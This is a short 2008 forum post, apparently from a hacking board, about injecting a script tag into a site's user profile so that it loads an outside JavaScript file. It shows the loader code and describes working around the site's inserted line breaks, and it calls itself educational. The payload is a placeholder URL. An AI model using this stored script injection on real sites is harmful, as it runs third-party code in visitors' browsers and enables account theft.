[align=center][b]insert your javascript without linker[/b]

[/align]

sory i am not opening new thread

this modificated from js injection <">when i insert the code into my profile with this format
[quote]<script>var script = document.createElement("script");
script.type = "text/javascript";
script.src = "[b]URL.JS[/b]";
document.getElementsByTagName("head")[0].appendChild(script);</script>[/quote]
it see like this if i view page source
[quote]<script>var script = document.createElement("script");
[b]<br />[/b]script.type = "text/javascript";
[b]<br />[/b]script.src = "url js";
[b]<br />[/b]document.getElementsByTagName("head")[0].appendChild(script);</script>[/quote]
and <br /> make the javascript doesn't work..

so i change to code like this <">it working

dont forget to change [b]URL.JS[/b] with your url js
sorry [i]not preview allowed[/i]

[b]for educational purpose only[/b]
Last edited by ichigo_reloaded (2008-12-27 19:56:51)